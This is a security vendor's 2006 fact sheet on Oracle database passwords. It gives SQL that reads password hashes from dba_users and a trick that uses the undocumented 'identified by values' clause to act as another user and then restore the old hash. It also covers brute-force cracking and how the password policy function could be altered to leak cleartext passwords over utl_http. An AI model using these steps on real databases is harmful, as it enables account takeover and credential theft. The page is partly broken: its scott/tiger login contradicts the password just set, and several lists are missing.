Red-Database-Security GmbH ist Spezialist für Oracle SecurityProdukteRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Dienstleistungen
Informationen
Neuigkeiten/Termine
Firma
|
Fact sheet about Oracle database passwords Oracle Password Algorithm (Designed by Bob Baldwin) Up to 30 characters long. All characters will be converted to uppercase before the hashing starts 8-byte hash, encrypted with a modified DES encryption algorithm without real salt. The algorithm can be found in the book "Special Ops Host And Network Security For Microsoft, Unix, And Oracle" on page 727.
Oracle Password Cracker A comparision of different password cracker can be found here. Location of Oracle password hashes
Show Oracle password hashkey You should always select database users from the table not from the views (ALL_USERS, DBA_USERS). An explanation (modification of database views via rootkits) can be found here.
How to change an Oracle password? You should always use the password command because the password is sent unencrypted over the net (without Advanced Security Option) if you use the alter user syntax.
How to change an Oracle password temporarily? In Oracle it is possible to change a password temporarily. This can be useful for DBA which act as a different user. SQL> select username,password from dba_users where username='SCOTT'; USERNAME PASSWORD -------- ---------------- SCOTT F894844C34402B67 SQL> alter user scott identified by mypassword; Now login with the following credentials: scott/tiger After doing your work you can change the password back by using an undocumented feature called "by values" SQL> alter user scott identified by values 'F894844C34402B67'; Oracle default password list 600+ default Oracle passwords Oracle Password Policy It is possible to setup a password policy (for strong Oracle passwords). A sample file how to do this can be found at $ORACLE_HOME/rdbms/admin/utlpwdmg.sql. If you use this functionality please be aware that the password policy function has access to the cleartext password (for the comparisions reasons). A hacker could modify your function and log all cleartext passwords entered by the users to a table or send it to a foreign webserver with utl_http. That's why you should checksum this function, e.g. with Repscan. Oracle brute force attacks / Oracle Password Decryption It is not possible to decrypt a hashstring but the simple Oracle salt (=Username) it is possible to do a brute force or dictionary attack. There are several Oracle brute force or dictionary attack tools available. These tools encrypt the username/password and compare the hashkeys. If the hashkey are identical the password is known. From simple SQL based tools (<500 pw/second) up to special C programs like checkpwd. The fastest tool calculates 1.100.000 passwords/second. On a Pentium 4 with 3 GHz it takes (26 ascii characters only, e.g. 26^5)
You should always use strong and long passwords to avoid brute force or dictionary attacks. Typical Error messages related to Oracle database passwords The following error messages are related to Oracle passwords:
Oracle database passwords in cleartext Cleartext passwords can be typically but not necessarily found at the following places
© 2005-2006 by Red-Database-Security GmbH - last update 21-Apr-2006 |
Oracle Patch Policy
More information available on Oracle OTN: Security Vulnerability Fixing Policy and Process |